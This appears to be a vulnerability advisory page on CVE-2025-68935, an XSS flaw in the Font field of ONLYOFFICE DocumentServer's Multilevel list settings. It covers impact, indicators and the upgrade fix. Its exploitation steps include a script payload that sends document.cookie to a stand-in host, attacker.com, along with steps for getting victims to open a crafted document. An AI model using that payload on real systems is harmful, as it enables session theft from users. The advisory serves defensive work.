CVE-2025-68935
ONLYOFFICE DocumentServer vulnerability analysis and mitigation

Overview

CVE-2025-68935 is a Cross-Site Scripting (XSS) vulnerability in ONLYOFFICE Docs (DocumentServer) that allows attackers to inject malicious scripts via the Font field in the Multilevel list settings window. It affects all versions of ONLYOFFICE DocumentServer before 9.2.1. The vulnerability was published on December 25, 2025, and has a CVSS v3.1 base score of 6.1 (Medium) (Red Hat CVE, ONLYOFFICE Changelog).

Technical details

The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting). The attack vector is network-based with low attack complexity, requiring no privileges but requiring user interaction, and has a changed scope indicating impact beyond the vulnerable component. Specifically, the Font field in the Multilevel list settings window fails to properly sanitize user-supplied input before rendering it in the browser, enabling injection of arbitrary JavaScript. The fix was documented in the ONLYOFFICE DocumentServer CHANGELOG for version 9.2.1 (ONLYOFFICE Changelog, Red Hat CVE).

Impact

Successful exploitation could allow an attacker to execute arbitrary JavaScript in the context of a victim's browser session, leading to limited confidentiality and integrity impacts such as session token theft, credential harvesting, or unauthorized actions performed on behalf of the victim. Because the scope is changed, the impact can extend beyond the ONLYOFFICE application itself to other resources accessible in the same browser context. Availability is not impacted by this vulnerability (Red Hat CVE).

Exploitability

No public exploit code or active in-the-wild exploitation has been reported for CVE-2025-68935 as of the available data. The EPSS score is approximately 0.029% (0.000290), indicating a very low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires user interaction — a victim must open or interact with a maliciously crafted document or configuration within ONLYOFFICE Docs (Red Hat CVE).

Exploitation steps

  1. Craft a malicious document: Create or modify an ONLYOFFICE document that includes a Multilevel list with a specially crafted Font field value containing an XSS payload (e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script> or an event-handler-based payload).
  2. Deliver the document to the victim: Share the malicious document with a target user via email, a shared workspace, or a collaborative editing link on a vulnerable ONLYOFFICE Docs instance (version < 9.2.1).
  3. Trigger the vulnerable UI element: Induce the victim to open the Multilevel list settings window (e.g., by formatting a list or opening list settings), which causes the unsanitized Font field value to be rendered in the browser.
  4. Execute the payload: The injected script executes in the victim's browser session, potentially stealing session cookies, performing actions on behalf of the user, or redirecting to attacker-controlled infrastructure (ONLYOFFICE Changelog).

Indicators of compromise

  • Network: Unexpected outbound HTTP requests from a user's browser to external or unknown domains shortly after interacting with ONLYOFFICE document list settings; requests containing encoded cookie or session data in URL parameters.
  • Logs: ONLYOFFICE server access logs showing delivery of documents with unusual or encoded content in list/font-related fields; browser console errors related to script injection in the document editor.
  • File System: Presence of ONLYOFFICE document files (.docx, .odt, etc.) with embedded or unusual font name strings containing HTML/JavaScript syntax in Multilevel list configurations.

Mitigation and workarounds

Users should upgrade ONLYOFFICE DocumentServer to version 9.2.1 or later, which addresses this vulnerability as noted in the official changelog. No specific configuration-based workaround has been publicly documented; upgrading is the recommended and primary remediation. Organizations unable to upgrade immediately should restrict access to ONLYOFFICE instances to trusted users and avoid opening documents from untrusted sources (ONLYOFFICE Changelog, Red Hat CVE).

Community reactions

Coverage of CVE-2025-68935 has been limited to vulnerability database aggregators and security tracking platforms. A brief write-up was published by Infinitsec, and the vulnerability was noted on Bluesky via automated CVE tracking accounts. No significant vendor statements beyond the changelog entry or notable researcher commentary have been identified (Red Hat CVE).

Additional resources


SourceThis report was generated using AI

Related ONLYOFFICE DocumentServer vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2023-46988MEDIUM6.7
  • ONLYOFFICE DocumentServer logoONLYOFFICE DocumentServer
  • cpe:2.3:a:onlyoffice:document_server
NoYesApr 01, 2025
CVE-2025-68917MEDIUM6.4
  • ONLYOFFICE DocumentServer logoONLYOFFICE DocumentServer
  • cpe:2.3:a:onlyoffice:document_server
NoYesDec 24, 2025
CVE-2025-68936MEDIUM6.1
  • ONLYOFFICE DocumentServer logoONLYOFFICE DocumentServer
  • cpe:2.3:a:onlyoffice:document_server
NoYesDec 25, 2025
CVE-2025-68935MEDIUM6.1
  • ONLYOFFICE DocumentServer logoONLYOFFICE DocumentServer
  • cpe:2.3:a:onlyoffice:document_server
NoYesDec 25, 2025
CVE-2023-50883MEDIUM6.1
  • ONLYOFFICE DocumentServer logoONLYOFFICE DocumentServer
  • cpe:2.3:a:onlyoffice:document_server
NoYesSep 09, 2024

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management